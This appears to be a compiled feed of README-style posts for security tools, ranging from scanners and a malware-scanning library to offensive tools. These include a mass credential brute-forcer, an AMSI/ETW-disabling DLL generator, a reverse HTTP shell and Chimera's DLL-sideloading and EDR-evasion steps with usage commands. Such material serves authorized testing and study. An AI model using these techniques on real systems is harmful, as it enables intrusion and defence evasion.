  • The regular installation steps above should suffice. If not, open up an issue.

Usage

(Enter) on a selected IP:Port to establish a Pantheon webview of the camera. (Use this at your own risk)

(Left-click) on a selected IP:Port to view the geolocation of the camera.
(Right-click) on a selected IP:Port to view the HTTP data of the camera (Ctrl+Left-click for Mac).

Adjust the map as you please to see the markers.

  • Also note that this app is far from perfect and not every link that shows up is a live-feed, some are login pages (Do NOT attempt to login).

Ethical Notice

The developer of this program, Josh Schiavone, is not responsible for misuse of this data gathering tool. Pantheon simply provides information that can be indexed by any modern search engine. Do not try to establish unauthorized access to live feeds that are password protected - that is illegal. Furthermore, if you do choose to use Pantheon to view a live-feed, do so at your own risk. Pantheon was developed for educational purposes only. For further information, please visit: https://joshschiavone.com/panth_info/panth_ethical_notice.html

Licence

MIT License
Copyright (c) Josh Schiavone



NetworkSherlock - Powerful And Flexible Port Scanning Tool With Shodan

By: Zion3R


NetworkSherlock is a powerful and flexible port scanning tool designed for network security professionals and penetration testers. With its advanced capabilities, NetworkSherlock can efficiently scan IP ranges, CIDR blocks, and multiple targets. It stands out with its detailed banner grabbing capabilities across various protocols and integration with Shodan, the world's premier service for scanning and analyzing internet-connected devices. This Shodan integration enables NetworkSherlock to provide enhanced scanning capabilities, giving users deeper insights into network vulnerabilities and potential threats. By combining local port scanning with Shodan's extensive database, NetworkSherlock offers a comprehensive tool for identifying and analyzing network security issues.


Features

  • Scans multiple IPs, IP ranges, and CIDR blocks.
  • Supports port scanning over TCP and UDP protocols.
  • Detailed banner grabbing feature.
  • Ping check for identifying reachable targets.
  • Multi-threading support for fast scanning operations.
  • Option to save scan results to a file.
  • Provides detailed version information.
  • Colorful console output for better readability.
  • Shodan integration for enhanced scanning capabilities.
  • Configuration file support for Shodan API key.

Installation

NetworkSherlock requires Python 3.6 or later.

  1. Clone the repository:
    git clone https://github.com/HalilDeniz/NetworkSherlock.git
  2. Install the required packages:
    pip install -r requirements.txt

Configuration

Update the networksherlock.cfg file with your Shodan API key:

[SHODAN]
api_key = YOUR_SHODAN_API_KEY
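
For reference, here is a minimal Python sketch (not NetworkSherlock's own code) of how a key stored in this format can be read with configparser and used with the official shodan library; the IP below is only an example:

import configparser

import shodan  # official Shodan Python library (pip install shodan)

config = configparser.ConfigParser()
config.read('networksherlock.cfg')
api = shodan.Shodan(config['SHODAN']['api_key'])

host = api.host('8.8.8.8')  # example IP, replace with your target
for banner in host.get('data', []):
    print(banner.get('port'), banner.get('product', ''))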

Usage

python3 networksherlock.py --help
usage: networksherlock.py [-h] [-p PORTS] [-t THREADS] [-P {tcp,udp}] [-V] [-s SAVE_RESULTS] [-c] target

NetworkSherlock: Port Scan Tool

positional arguments:
target Target IP address(es), range, or CIDR (e.g., 192.168.1.1, 192.168.1.1-192.168.1.5,
192.168.1.0/24)

options:
-h, --help show this help message and exit
-p PORTS, --ports PORTS
Ports to scan (e.g. 1-1024, 21,22,80, or 80)
-t THREADS, --threads THREADS
Number of threads to use
-P {tcp,udp}, --protocol {tcp,udp}
Protocol to use for scanning
-V, --version-info Used to get version information
-s SAVE_RESULTS, --save-results SAVE_RESULTS
File to save scan results
-c, --ping-check Perform ping check before scanning
--use-shodan Enable Shodan integration for additional information

Basic Parameters

  • target: The target IP address(es), IP range, or CIDR block to scan.
  • -p, --ports: Ports to scan (e.g., 1-1000, 22,80,443).
  • -t, --threads: Number of threads to use.
  • -P, --protocol: Protocol to use for scanning (tcp or udp).
  • -V, --version-info: Obtain version information during banner grabbing.
  • -s, --save-results: Save results to the specified file.
  • -c, --ping-check: Perform a ping check before scanning.
  • --use-shodan: Enable Shodan integration.

Example Usage

Basic Port Scan

Scan a single IP address on default ports:

python networksherlock.py 192.168.1.1

Custom Port Range

Scan an IP address with a custom range of ports:

python networksherlock.py 192.168.1.1 -p 1-1024

Multiple IPs and Port Specification

Scan multiple IP addresses on specific ports:

python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443

CIDR Block Scan

Scan an entire subnet using CIDR notation:

python networksherlock.py 192.168.1.0/24 -p 80

Using Multi-Threading

Perform a scan using multiple threads for faster execution:

python networksherlock.py 192.168.1.1-192.168.1.5 -p 1-1024 -t 20

Scanning with Protocol Selection

Scan using a specific protocol (TCP or UDP):

python networksherlock.py 192.168.1.1 -p 53 -P udp

Scan with Shodan

python networksherlock.py 192.168.1.1 --use-shodan

Scan Multiple Targets with Shodan

python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443 -V --use-shodan

Banner Grabbing and Save Results

Perform a detailed scan with banner grabbing and save results to a file:

python networksherlock.py 192.168.1.1 -p 1-1000 -V -s results.txt

Ping Check Before Scanning

Scan an IP range after performing a ping check:

python networksherlock.py 10.0.0.1-10.0.0.255 -c

OUTPUT EXAMPLE

$ python3 networksherlock.py 10.0.2.12 -t 25 -V -p 21-6000 -t 25
********************************************
Scanning target: 10.0.2.12
Scanning IP : 10.0.2.12
Ports : 21-6000
Threads : 25
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
21 /tcp open telnet 220 (vsFTPd 2.3.4)
80 /tcp open http HTTP/1.1 200 OK
139 /tcp open netbios-ssn %SMBr
25 /tcp open smtp 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
23 /tcp open smtp #' #'
445 /tcp open microsoft-ds %SMBr
514 /tcp open shell
512 /tcp open exec Where are you?
1524/tcp open ingreslock ro ot@metasploitable:/#
2121/tcp open iprop 220 ProFTPD 1.3.1 Server (Debian) [::ffff:10.0.2.12]
3306/tcp open mysql >
5900/tcp open unknown RFB 003.003
53 /tcp open domain
---------------------------------------------

OutPut Example

$ python3 networksherlock.py 10.0.2.0/24 -t 10 -V -p 21-1000
********************************************
Scanning target: 10.0.2.1
Scanning IP : 10.0.2.1
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
53 /tcp open domain
********************************************
Scanning target: 10.0.2.2
Scanning IP : 10.0.2.2
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
445 /tcp open microsoft-ds
135 /tcp open epmap
********************************************
Scanning target: 10.0.2.12
Scanning IP : 10.0.2.12
Ports : 21- 1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
21 /tcp open ftp 220 (vsFTPd 2.3.4)
22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
23 /tcp open telnet #'
80 /tcp open http HTTP/1.1 200 OK
53 /tcp open kpasswd 464/udpcp
445 /tcp open domain %SMBr
3306/tcp open mysql >
********************************************
Scanning target: 10.0.2.20
Scanning IP : 10.0.2.20
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
22 /tcp open ssh SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9

Contributing

Contributions are welcome! To contribute to NetworkSherlock, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact



Py-Amsi - Scan Strings Or Files For Malware Using The Windows Antimalware Scan Interface

By: Zion3R


py-amsi is a library that scans strings or files for malware using the Windows Antimalware Scan Interface (AMSI) API. AMSI is an interface native to Windows that allows applications to ask the antivirus installed on the system to analyse a file/string. AMSI is not tied to Windows Defender. Antivirus providers implement the AMSI interface to receive calls from applications. This library takes advantage of the API to perform antivirus scans in Python. Read more about the Windows AMSI API here.


Installation

  • Via pip

    pip install pyamsi
  • Clone repository

    git clone https://github.com/Tomiwa-Ot/py-amsi.git
    cd py-amsi/
    python setup.py install

Usage

from pyamsi import Amsi

# Scan a file
Amsi.scan_file(file_path, debug=True) # debug is optional and False by default

# Scan string
Amsi.scan_string(string, string_name, debug=False) # debug is optional and False by default

# Both functions return a dictionary of the format
# {
# 'Sample Size' : 68, // The string/file size in bytes
# 'Risk Level' : 0, // The risk level as suggested by the antivirus
# 'Message' : 'File is clean' // Response message
# }
Risk Level Meaning
0 AMSI_RESULT_CLEAN (File is clean)
1 AMSI_RESULT_NOT_DETECTED (No threat detected)
16384 AMSI_RESULT_BLOCKED_BY_ADMIN_START (Threat is blocked by the administrator)
20479 AMSI_RESULT_BLOCKED_BY_ADMIN_END (Threat is blocked by the administrator)
32768 AMSI_RESULT_DETECTED (File is considered malware)
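
A minimal usage sketch based on the documented return format and the risk levels above (assumes a Windows host with an active AMSI provider; the EICAR test string is used as a harmless detection trigger):

from pyamsi import Amsi

# EICAR is a standard, harmless antivirus test string
eicar = r'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'
result = Amsi.scan_string(eicar, 'eicar-test')

if result['Risk Level'] >= 32768:  # AMSI_RESULT_DETECTED
    print('Malware detected:', result['Message'])
else:
    print('Clean or not detected:', result['Message'])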

Docs

https://tomiwa-ot.github.io/py-amsi/index.html



Mass-Bruter - Mass Bruteforce Network Protocols

By: Zion3R


Mass bruteforce network protocols

Info

Simple personal script to quickly mass bruteforce common services across a large network.
It will check for default credentials on FTP, SSH, MySQL, MSSQL, etc.
This was made for authorized red team penetration testing purposes only.


How it works

  1. Use masscan (faster than nmap) to find alive hosts with common ports in the network segment.
  2. Parse IPs and ports from the masscan results (see the sketch after this list).
  3. Craft and run hydra commands to automatically bruteforce supported network services on the discovered devices.
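
For illustration, here is a minimal Python sketch (not the project's own parser) of step 2, assuming masscan's default "Discovered open port <port>/<proto> on <ip>" console output saved under ./result/masscan/:

import re
from collections import defaultdict
from pathlib import Path

line_re = re.compile(r'Discovered open port (\d+)/(tcp|udp) on ([\d.]+)')

hosts = defaultdict(set)
for result_file in Path('./result/masscan/').glob('masscan_*.txt'):
    for line in result_file.read_text().splitlines():
        match = line_re.search(line)
        if match:
            port, proto, ip = match.groups()
            hosts[ip].add(int(port))

for ip, ports in sorted(hosts.items()):
    print(ip, sorted(ports))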

Requirements

  • Kali linux or any preferred linux distribution
  • Python 3.10+
# Clone the repo
git clone https://github.com/opabravo/mass-bruter
cd mass-bruter

# Install required tools for the script
apt update && apt install seclists masscan hydra

How To Use

Private ip range : 10.0.0.0/8, 192.168.0.0/16, 172.16.0.0/12

Save masscan results under ./result/masscan/, with the format masscan_<name>.<ext>

Ex: masscan_192.168.0.0-16.txt

Example command:

masscan -p 3306,1433,21,22,23,445,3389,5900,6379,27017,5432,5984,11211,9200,1521 172.16.0.0/12 | tee ./result/masscan/masscan_test.txt

Example Resume Command:

masscan --resume paused.conf | tee -a ./result/masscan/masscan_test.txt

Command Options

┌──(root㉿root)-[~/mass-bruter]
└─# python3 mass_bruteforce.py
Usage: [OPTIONS]

Mass Bruteforce Script

Options:
-q, --quick Quick mode (Only brute telnet, ssh, ftp , mysql,
mssql, postgres, oracle)
-a, --all Brute all services(Very Slow)
-s, --show Show result with successful login
-f, --file-path PATH The directory or file that contains masscan result
[default: ./result/masscan/]
--help Show this message and exit.

Quick Bruteforce Example:

python3 mass_bruteforce.py -q -f ~/masscan_script.txt

Fetch cracked credentials:

python3 mass_bruteforce.py -s

Todo

  • Migrate with dpl4hydra
  • Optimize the code and functions
  • MultiProcessing

Any contributions are welcome!



LightsOut - Generate An Obfuscated DLL That Will Disable AMSI And ETW

By: Zion3R


LightsOut will generate an obfuscated DLL that will disable AMSI & ETW while trying to evade AV. This is done by randomizing all WinAPI functions used, xor encoding strings, and utilizing basic sandbox checks. Mingw-w64 is used to compile the obfuscated C code into a DLL that can be loaded into any process where AMSI or ETW are present (i.e. PowerShell).

LightsOut is designed to work on Linux systems with python3 and mingw-w64 installed. No other dependencies are required.


Features currently include:

  • XOR encoding for strings
  • WinAPI function name randomization
  • Multiple sandbox check options
  • Hardware breakpoint bypass option
 _______________________
| |
| AMSI + ETW |
| |
| LIGHTS OUT |
| _______ |
| || || |
| ||_____|| |
| |/ /|| |
| / / || |
| /____/ /-' |
| |____|/ |
| |
| @icyguider |
| |
| RG|
`-----------------------'
usage: lightsout.py [-h] [-m <method>] [-s <option>] [-sa <value>] [-k <key>] [-o <outfile>] [-p <pid>]

Generate an obfuscated DLL that will disable AMSI & ETW

options:
-h, --help show this help message and exit
-m <method>, --method <method>
Bypass technique (Options: patch, hwbp, remote_patch) (Default: patch)
-s <option>, --sandbox <option>
Sandbox evasion technique (Options: mathsleep, username, hostname, domain) (Default: mathsleep)
-sa <value>, --sandbox-arg <value>
Argument for sandbox evasion technique (Ex: WIN10CO-DESKTOP, testlab.local)
-k <key>, --key <key>
Key to encode strings with (randomly generated by default)
-o <outfile>, --outfile <outfile>
File to save DLL to

Remote options:
-p <pid>, --pid <pid>
PID of remote process to patch

Intended Use/Opsec Considerations

This tool was designed to be used on pentests, primarily to execute malicious powershell scripts without getting blocked by AV/EDR. Because of this, the tool is very barebones and a lot can be added to improve opsec. Do not expect this tool to completely evade detection by EDR.

Usage Examples

You can transfer the output DLL to your target system and load it into PowerShell in various ways. For example, it can be done via P/Invoke with LoadLibrary:

Or even easier, copy powershell to an arbitrary location and side load the DLL!

Greetz/Credit/Further Reference:



HBSQLI - Automated Tool For Testing Header Based Blind SQL Injection

By: Zion3R


HBSQLI is an automated command-line tool for performing Header Based Blind SQL injection attacks on web applications. It automates the process of detecting Header Based Blind SQL injection vulnerabilities, making it easier for security researchers, penetration testers & bug bounty hunters to test the security of web applications.


Disclaimer:

This tool is intended for authorized penetration testing and security assessment purposes only. Any unauthorized or malicious use of this tool is strictly prohibited and may result in legal action.

The authors and contributors of this tool do not take any responsibility for any damage, legal issues, or other consequences caused by the misuse of this tool. The use of this tool is solely at the user's own risk.

Users are responsible for complying with all applicable laws and regulations regarding the use of this tool, including but not limited to, obtaining all necessary permissions and consents before conducting any testing or assessment.

By using this tool, users acknowledge and accept these terms and conditions and agree to use this tool in accordance with all applicable laws and regulations.

Installation

Install HBSQLI with following steps:

$ git clone https://github.com/SAPT01/HBSQLI.git
$ cd HBSQLI
$ pip3 install -r requirements.txt

Usage/Examples

usage: hbsqli.py [-h] [-l LIST] [-u URL] -p PAYLOADS -H HEADERS [-v]

options:
-h, --help show this help message and exit
-l LIST, --list LIST To provide list of urls as an input
-u URL, --url URL To provide single url as an input
-p PAYLOADS, --payloads PAYLOADS
To provide payload file having Blind SQL Payloads with delay of 30 sec
-H HEADERS, --headers HEADERS
To provide header file having HTTP Headers which are to be injected
-v, --verbose Run on verbose mode

For Single URL:

$ python3 hbsqli.py -u "https://target.com" -p payloads.txt -H headers.txt -v

For List of URLs:

$ python3 hbsqli.py -l urls.txt -p payloads.txt -H headers.txt -v

Modes

There are basically two modes: verbose, which shows the whole process and the status of each test performed, and non-verbose, which just prints the vulnerable ones to the screen. To enable verbose mode, add -v to your command.

Notes

  • You can use the provided payload file or a custom payload file; just remember that the delay in each payload should be set to 30 seconds (see the sketch after these notes).

  • You can use the provided headers file or add more custom headers to that file according to your needs.
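
For illustration, a minimal Python sketch (not HBSQLI's own code) of the underlying idea: inject a time-based payload into a single header and flag the URL if the response is delayed by roughly the payload's sleep time. The target URL, header name and payload below are examples only:

import time

import requests

url = 'https://target.example'       # hypothetical target
header = 'X-Forwarded-For'           # example header to inject into
payload = "' AND SLEEP(30)-- -"      # example 30-second time-based payload

start = time.time()
try:
    requests.get(url, headers={header: payload}, timeout=60)
except requests.RequestException:
    pass
if time.time() - start >= 30:
    print(f'[VULNERABLE] {url} via {header}')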

Demo



KnockKnock - Enumerate Valid Users Within Microsoft Teams And OneDrive With Clean Output

By: Zion3R


Designed to validate potential usernames by querying OneDrive and/or Microsoft Teams, which are passive methods.
Additionally, it can output/create a list of legacy Skype users identified through Microsoft Teams enumeration.
Finally, it also creates a nice clean list for future usage, all conducted from a single tool.


Usage

$ python3 .\KnockKnock.py -h

_ __ _ _ __ _
| |/ /_ __ ___ ___| | _| |/ /_ __ ___ ___| | __
| ' /| '_ \ / _ \ / __| |/ / ' /| '_ \ / _ \ / __| |/ /
| . \| | | | (_) | (__| <| . \| | | | (_) | (__| <
|_|\_\_| |_|\___/ \___|_|\_\_|\_\_| |_|\___/ \___|_|\_\
v0.9 Author: @waffl3ss


usage: KnockKnock.py [-h] [-teams] [-onedrive] [-l] -i INPUTLIST [-o OUTPUTFILE] -d TARGETDOMAIN [-t TEAMSTOKEN] [-threads MAXTHREADS] [-v]

options:
-h, --help show this help message and exit
-teams Run the Teams User Enumeration Module
-onedrive Run the One Drive Enumeration Module
-l Write legacy skype users to a seperate file
-i INPUTLIST Input file with newline-seperated users to check
-o OUTPUTFILE Write output to file
-d TARGETDOMAIN Domain to target
-t TEAMSTOKEN Teams Token (file containing token or a string)
-threads MAXTHREADS Number of threads to use in the Teams User Enumeration (default = 10)
-v Show verbose errors

Examples

./KnockKnock.py -teams -i UsersList.txt -d Example.com -o OutFile.txt -t BearerToken.txt
./KnockKnock.py -onedrive -i UsersList.txt -d Example.com -o OutFile.txt
./KnockKnock.py -onedrive -teams -i UsersList.txt -d Example.com -t BearerToken.txt -l

Options

  • You can select one or both modes, as long as the appropriate options are provided for the modules selected.
  • Both modules will require the domain flag (-d) and the user input list (-i).
  • The tool does not require an output file as an option, and if not supplied, it will print to screen only.
  • The verbose mode will show A LOT of extra information, including users that are not valid.
  • The Teams option requires a bearer token. The script automatically removes the beginning and end portions to use only what's required.

How to get your Bearer token

To get your bearer token, you will need a cookie manager plugin in your browser; log in to your own Microsoft Teams through the browser.
Next, view the cookies related to the current webpage (teams.microsoft.com).
The cookie you are looking for is for the domain .teams.microsoft.com and is titled "authtoken".
You can copy the whole token as the script will split out the required part for you.


References

@nyxgeek - onedrive_user_enum
@immunIT - TeamsUserEnum



ADCSKiller - An ADCS Exploitation Automation Tool Weaponizing Certipy And Coercer

By: Zion3R

ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure. Please note that ADCSKiller is currently in its first draft and will undergo further refinements and additions in future updates.


Features

  • Enumerate Domain Administrators via LDAP
  • Enumerate Domain Controllers via LDAP
  • Enumerate Certificate Authorities via Certipy
  • Exploitation of ESC1
  • Exploitation of ESC8

Installation

Since this tool relies on Certipy and Coercer, both tools have to be installed first.

git clone https://github.com/ly4k/Certipy && cd Certipy && python3 setup.py install
git clone https://github.com/p0dalirius/Coercer && cd Coercer && pip install -r requirements.txt && python3 setup.py install
git clone https://github.com/grimlockx/ADCSKiller/ && cd ADCSKiller && pip install -r requirements.txt

Usage

Usage: adcskiller.py [-h] -d DOMAIN -u USERNAME -p PASSWORD -t TARGET -l LEVEL -L LHOST

Options:
-h, --help Show this help message and exit.
-d DOMAIN, --domain DOMAIN
Target domain name. Use FQDN
-u USERNAME, --username USERNAME
Username.
-p PASSWORD, --password PASSWORD
Password.
-dc-ip TARGET, --target TARGET
IP Address of the domain controller.
-L LHOST, --lhost LHOST
FQDN of the listener machine - An ADIDNS is probably required

Todos

  • Tests, Tests, Tests
  • Enumerate principals which are allowed to dcsync
  • Use dirkjanm's gettgtpkinit.py to receive a ticket instead of Certipy auth
  • Support DC Certificate Authorities
  • ESC2 - ESC7
  • ESC9 - ESC11?
  • Automatically add an ADIDNS entry if required
  • Support DCSync functionality

Credits



HTTP-Shell - MultiPlatform HTTP Reverse Shell

By: Zion3R


HTTP-Shell is a multiplatform reverse shell. This tool helps you obtain a shell-like interface over a reverse HTTP connection. Unlike other reverse shells, the main goal of the tool is to use it in conjunction with Microsoft Dev Tunnels, in order to get a connection as close as possible to a legitimate one.

This shell is not fully interactive, but displays any errors on screen (both Windows and Linux), is capable of uploading and downloading files, has command history, terminal cleanup (even with CTRL+L), automatic reconnection and movement between directories.


Requirements

  • Python 3 for Server
  • Install requirements.txt
  • Bash for Linux Client
  • PowerShell 4.0 or greater for Windows Client

Download

It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

git clone https://github.com/JoelGMSec/HTTP-Shell

Usage

The detailed guide of use can be found at the following link:

https://darkbyte.net/obteniendo-shells-con-microsoft-dev-tunnels

License

This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments

This tool has been created and designed from scratch by Joel Gรกmez Molina (@JoelGMSec).

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.



PurpleOps - An Open-Source Self-Hosted Purple Team Management Web Application

By: Zion3R


An open-source self-hosted purple team management web application.


Key Features

  • Template engagements and testcases
  • Framework friendly
  • Role-based Access Control & MFA
  • Inbuilt DOCX reporting + custom template support

How PurpleOps is different:

  • No attribution needed
  • Hackable, no "no-reversing" clauses
  • No over-complication with Tomcat, Redis, manual database transplanting and an obtuse permission model

Installation

# Clone this repository
$ git clone https://github.com/CyberCX-STA/PurpleOps

# Go into the repository
$ cd PurpleOps

# Alter PurpleOps settings (if you want to customize anything but should work out the box)
$ nano .env

# Run the app with docker
$ sudo docker compose up

# PurpleOps should now be available on http://localhost:5000. It is recommended to add a reverse proxy such as nginx or Apache in front of it if you want to expose this to the outside world.

# Alternatively
$ sudo docker run --name mongodb -d -p 27017:27017 mongo
$ pip3 install -r requirements.txt
$ python3 seeder.py
$ python3 purpleops.py

Contact Us

We would love to hear back from you. If something is broken or you have an idea to make it better, add a ticket or ping us: pops@purpleops.app | @_w_m__

Credits



DNSWatch - DNS Traffic Sniffer and Analyzer

By: Zion3R


DNSWatch is a Python-based tool that allows you to sniff and analyze DNS (Domain Name System) traffic on your network. It listens to DNS requests and responses and provides insights into the DNS activity.
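
As a rough idea of what DNS sniffing with scapy (one of the requirements below) looks like, here is a minimal Python sketch; it is not DNSWatch's own code, the interface name is an example, and it needs root privileges:

from scapy.all import DNS, DNSQR, IP, sniff

def show_query(packet):
    # Only print DNS queries (qr == 0) carried over IPv4
    if packet.haslayer(IP) and packet.haslayer(DNSQR) and packet[DNS].qr == 0:
        print(packet[IP].src, '->', packet[IP].dst, packet[DNSQR].qname.decode())

sniff(iface='eth0', filter='udp port 53', prn=show_query, store=False)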

Features

  • Sniff and analyze DNS requests and responses.
  • Display DNS requests with their corresponding source and destination IP addresses.
  • Optional verbose mode for detailed packet inspection.
  • Save the results to a specified output file.
  • Filter DNS traffic by specifying a target IP address.
  • Save DNS requests in a database for further analysis (optional)
  • Analyze DNS types (optional).
  • Support for DNS over HTTPS (DoH) (optional).

Requirements

  • Python 3.7+
  • scapy 2.4.5 or higher
  • colorama 0.4.4 or higher

Installation

  1. Clone this repository:
git clone https://github.com/HalilDeniz/DNSWatch.git
  1. Install the required dependencies:
pip install -r requirements.txt

Usage

python dnswatch.py -i <interface> [-v] [-o <output_file>] [-k <target_ip>] [--analyze-dns-types] [--doh]
  • -i, --interface: Specify the network interface (e.g., eth0).
  • -v, --verbose: Use this flag for more verbose output.
  • -o, --output: Specify the filename to save results.
  • -t, --target-ip: Specify a specific target IP address to monitor.
  • -adt, --analyze-dns-types: Analyze DNS types.
  • --doh: Use DNS over HTTPS (DoH) for resolving DNS requests.
  • -fd, --target-domains: Filter DNS requests by specified domains.
  • -d, --database: Enable database storage for DNS requests.

Press Ctrl+C to stop the sniffing process.

Examples

  • Sniff DNS traffic on interface "eth0":
python dnswatch.py -i eth0
  • Sniff DNS traffic on interface "eth0" and save the results to a file:
python dnswatch.py -i eth0 -o dns_results.txt
  • Sniff DNS traffic on interface "eth0" and filter requests/responses involving a specific target IP:
python dnswatch.py -i eth0 -k 192.168.1.100
  • Sniff DNS traffic on interface "eth0" and enable DNS type analysis:
python dnswatch.py -i eth0 --analyze-dns-types
  • Sniff DNS traffic on interface "eth0" using DNS over HTTPS (DoH):
python dnswatch.py -i eth0 --doh
  • Sniff DNS traffic on interface "wlan0" and Enable database storage
python3 dnswatch.py -i wlan0 --database

License

DNSWatch is licensed under the MIT License. See the LICENSE file for details.

Disclaimer

This tool is intended for educational and testing purposes only. It should not be used for any malicious activities.

Contact



Chimera - Automated DLL Sideloading Tool With EDR Evasion Capabilities

By: Zion3R


While DLL sideloading can be used for legitimate purposes, such as loading necessary libraries for a program to function, it can also be used for malicious purposes. Attackers can use DLL sideloading to execute arbitrary code on a target system, often by exploiting vulnerabilities in legitimate applications that are used to load DLLs.

To automate the DLL sideloading process and make it more effective, Chimera was created: a tool that includes evasion methodologies to bypass EDR/AV products. The tool can automatically encrypt a shellcode via XOR with a random key and create template files that can be imported into Visual Studio to create a malicious DLL.
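
As a rough illustration of the XOR step (not Chimera's own code; a single-byte key is assumed here for simplicity):

import os

# XOR-encode a raw shellcode file with a random single-byte key
with open('met.bin', 'rb') as handle:      # raw payload file, as in the usage examples below
    shellcode = handle.read()

key = os.urandom(1)[0]
encoded = bytes(byte ^ key for byte in shellcode)
print(f'key = {key:#04x}, encoded {len(encoded)} bytes')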

Dynamic syscalls from SysWhispers2 are used, along with a modified assembly version to evade the patterns that EDRs search for; random NOP sleds are added and registers are shuffled. Furthermore, Early Bird injection is used to inject the shellcode into another process, which the user can specify, combined with sandbox evasion mechanisms such as a hard-disk check and a check for whether the process is being debugged. Finally, a timing attack is placed in the loader, which uses waitable timers to delay the execution of the shellcode.

This tool has been tested and shown to be effective at bypassing EDR/AV products and executing arbitrary code on a target system.


Tool Usage

Chimera is written in python3 and there is no need to install any extra dependencies.

Chimera currently supports two DLL options either Microsoft teams or Microsoft OneDrive.

For Microsoft Teams, you can create userenv.dll, which is a missing DLL from Microsoft Teams, and place it in the following folder:

%USERPROFILE%/Appdata/local/Microsoft/Teams/current

For Microsoft OneDrive, the script uses version.dll, which is commonly missing from binaries such as onedriveupdater.exe.

Chimera Usage.

python3 ./chimera.py met.bin chimera_automation notepad.exe teams

python3 ./chimera.py met.bin chimera_automation notepad.exe onedrive

Additional Options

  • [raw payload file] : Path to file containing shellcode
  • [output path] : Path to output the C template file
  • [process name] : Name of process to inject shellcode into
  • [dll_exports] : Specify which DLL Exports you want to use either teams or onedrive
  • [replace shellcode variable name] : [Optional] Replace shellcode variable name with a unique name
  • [replace xor encryption name] : [Optional] Replace xor encryption name with a unique name
  • [replace key variable name] : [Optional] Replace key variable name with a unique name
  • [replace sleep time via waitable timers] : [Optional] Replace sleep time your own sleep time

Useful Note

Once the compilation process is complete, a DLL will be generated, which should include either "version.dll" for OneDrive or "userenv.dll" for Microsoft Teams. Next, it is necessary to rename the original DLLs.

For instance, the original "userenv.dll" should be renamed as "tmpB0F7.dll," while the original "version.dll" should be renamed as "tmp44BC.dll." Additionally, you have the option to modify the name of the proxy DLL as desired by altering the source code of the DLL exports instead of using the default script names.

Visual Studio Project Setup

Step 1: Creating a New Visual Studio Project with DLL Template

  1. Launch Visual Studio and click on "Create a new project" or go to "File" -> "New" -> "Project."
  2. In the project templates window, select "Visual C++" from the left-hand side.
  3. Choose "Empty Project" from the available templates.
  4. Provide a suitable name and location for the project, then click "OK."
  5. On the project properties window, navigate to "Configuration Properties" -> "General" and set the "Configuration Type" to "Dynamic Library (.dll)."
  6. Configure other project settings as desired and save the project.


Step 2: Importing Files into the Visual Studio Project

  1. Locate the "chimera_automation" folder containing the necessary Images.
  2. Open the folder and identify the following Images: main.c, syscalls.c, syscallsstubs.std.x64.asm.
  3. In Visual Studio, right-click on the project in the "Solution Explorer" panel and select "Add" -> "Existing Item."
  4. Browse to the location of each file (main.c, syscalls.c, syscallsstubs.std.x64.asm) and select them one by one. Click "Add" to import them into the project.
  5. Create a folder named "header_Images" within the project directory if it doesn't exist already.
  6. Locate the "syscalls.h" header file in the "header_Images" folder of the "chimera_automation" directory.
  7. Right-click on the "header_Images" folder in Visual Studio's "Solution Explorer" panel and select "Add" -> "Existing Item."
  8. Browse to the location of "syscalls.h" and select it. Click "Add" to import it into the project.

Step 3: Build Customization

  1. In the project properties window, navigate to "Configuration Properties" -> "Build Customizations."
  2. Click the "Build Customizations" button to open the build customization dialog.

Step 4: Enable MASM

  1. In the build customization dialog, check the box next to "masm" to enable it.
  2. Click "OK" to close the build customization dialog.


Step 5:

  1. Right click the assembly file → properties and choose the following
  2. Exclude from build → No
  3. Content → Yes
  4. Item type → Microsoft Macro Assembler


Final Project Setup


Compiler Optimizations

Step 1: Change optimization

  1. In Visual Studio choose Project → properties
  2. C/C++ Optimization and change to the following


Step 2: Remove Debug Information

  1. In Visual Studio choose Project → properties
  2. Linker → Debugging → Generate Debug Info → No


Liability Disclaimer:

To the maximum extent permitted by applicable law, myself(George Sotiriadis) and/or affiliates who have submitted content to my repo, shall not be liable for any indirect, incidental, special, consequential or punitive damages, or any loss of profits or revenue, whether incurred directly or indirectly, or any loss of data, use, goodwill, or other intangible losses, resulting from (i) your access to this resource and/or inability to access this resource; (ii) any conduct or content of any third party referenced by this resource, including without limitation, any defamatory, offensive or illegal conduct or other users or third parties; (iii) any content obtained from this resource

References

https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection

https://evasions.checkpoint.com/

https://github.com/Flangvik/SharpDllProxy

https://github.com/jthuraisamy/SysWhispers2

https://systemweakness.com/on-disk-detection-bypass-avs-edr-s-using-syscalls-with-legacy-instruction-series-of-instructions-5c1f31d1af7d

https://github.com/Mr-Un1k0d3r



Golddigger - Search Files For Gold

By: Zion3R


Gold Digger is a simple tool used to help quickly discover sensitive information in files recursively. Originally written to assist in rapidly searching files obtained during a penetration test.


Installation

Gold Digger requires Python3.

virtualenv -p python3 .
source bin/activate
python dig.py --help

Usage

usage: dig.py [-h] [-e EXCLUDE] [-g GOLD] -d DIRECTORY [-r RECURSIVE] [-l LOG]

optional arguments:
-h, --help show this help message and exit
-e EXCLUDE, --exclude EXCLUDE
JSON file containing extension exclusions
